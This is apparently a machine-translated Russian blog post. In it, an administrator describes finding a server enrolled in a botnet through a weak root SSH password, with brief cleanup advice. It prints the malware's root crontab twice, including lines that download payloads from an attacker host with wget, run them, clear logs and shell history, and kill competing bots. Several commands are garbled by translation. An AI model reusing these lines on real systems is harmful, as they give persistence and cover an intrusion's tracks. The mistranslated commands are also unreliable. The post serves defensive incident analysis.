Недавно получил на обслуживание старый сервер, который регулярно вызывал проблемы при раздаче интернета через прокси. В ходе процедуры выяснилось, что сервер был вовлечен в ботнет, который проявлялся следующим образом:

/etc/sfewfesfs и /etc/.SSH застряли в списке процессов

Чрезвычайно высокий исходящий трафик для этого сервера

eth1: июнь ཊ 18,97 ГиБ / 145,58 ГиБ / 164,55 ГиБ


Статистика использует внешний интерфейс, когда компьютер участвует в ботнете

Постоянное SSH-соединение с китайским адресом 116.10.191.0/24

Заражение, скорее всего, произошло следующим образом:

До того, как сервер был за собственным модемом ADSL, у него были сильные пароли на модеме, но слабые пароли на самом сервере.Через несколько лет, после продления договора ADSL, их заменили на модем, который использовался до сих пор. недавно были настройки по умолчанию, т.е. всем известный логин/пароль admin/admin. При этом один из предыдущих админов пробросил 22 порт на сервер и привязал модем к dyndns.org. Итак, во время сканирования достаточно было зайти на SSH-сервер с простым паролем root и установить все необходимое.

Бэкдор работает следующим образом:

Многие правила записываются в cron пользователя root (/var/spool/cron/crontabs/root), который регулярно обновляет вирус

*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/120 * * * * cd /root;rm -rf dir nohup.out
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * cd /etc;rm -rf каталог gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /root > .bash_history
*/1 * * * * cd /var/log > журнал доступа
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > чашки
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > журнал ошибок
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > журнал сообщений
*/1 * * * * cd /var/log > Сообщения
*/1 * * * * cd /var/log > безопасный
*/1 * * * * cd /var/log > Спулеры
*/1 * * * * cd /var/log > судолог
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/ferwfrre
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * История -c
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 freeBSD
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 ленгчао32
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 профиль.ключ
*/360 * * * * cd /etc;rm -rf каталог dsfrefr
*/360 * * * * cd /etc;rm -rf каталог ferwfrre
*/360 * * * * cd /etc;rm -rf каталог gfhddsfew
*/360 * * * * cd /etc;rm -rf каталог gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf каталог rewgtf3er4t
*/360 * * * * cd /etc;rm -rf каталог sdmfdsfhjfe
*/94 * * * * killall -9 dsfrefr
*/95 * * * * killall -9 ferwfrre
*/96 * * * * killall -9 rewgtf3er4t
*/97 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/99 * * * * killall -9 sdmfdsfhjfe
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/120 * * * * cd /root;rm -rf dir nohup.out
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * cd /etc;rm -rf каталог gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /root > .bash_history
*/1 * * * * cd /var/log > журнал доступа
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > чашки
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > журнал ошибок
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > журнал сообщений
*/1 * * * * cd /var/log > Сообщения
*/1 * * * * cd /var/log > конечно
*/1 * * * * cd /var/log > Спулеры
*/1 * * * * cd /var/log > судолог
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/ferwfrre
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * История -c
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 freeBSD
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 ленгчао32
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 профиль.ключ
*/360 * * * * cd /etc;rm -rf каталог dsfrefr
*/360 * * * * cd /etc;rm -rf каталог ferwfrre
*/360 * * * * cd /etc;rm -rf каталог gfhddsfew
*/360 * * * * cd /etc;rm -rf каталог gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf каталог rewgtf3er4t
*/360 * * * * cd /etc;rm -rf каталог sdmfdsfhjfe
*/94 * * * * killall -9 dsfrefr
*/95 * * * * killall -9 ferwfrre
*/96 * * * * killall -9 rewgtf3er4t
*/97 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/99 * * * * killall -9 sdmfdsfhjfe
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&

Поэтому первым шагом будет удаление правил crontab, затем уничтожение всех заданных процессов и удаление файлов, которые они используют.

ЧИТАТЬ  Google: разрешить GoogleBot обходить возрастное ограничение для контента для взрослых

И, наконец, самым надежным способом мне видится переустановка дистрибутива.

Source

Похожие записи:

  1. Удаление физического раздела из LVM
  2. Учебники по Gimp: ретушь ювелирных изделий
  3. Пользователи Windows — настоящее зло, пользователи Windows против свободного доступа к информации
  4. Учебники по Gimp: выделение сложного фрагмента изображения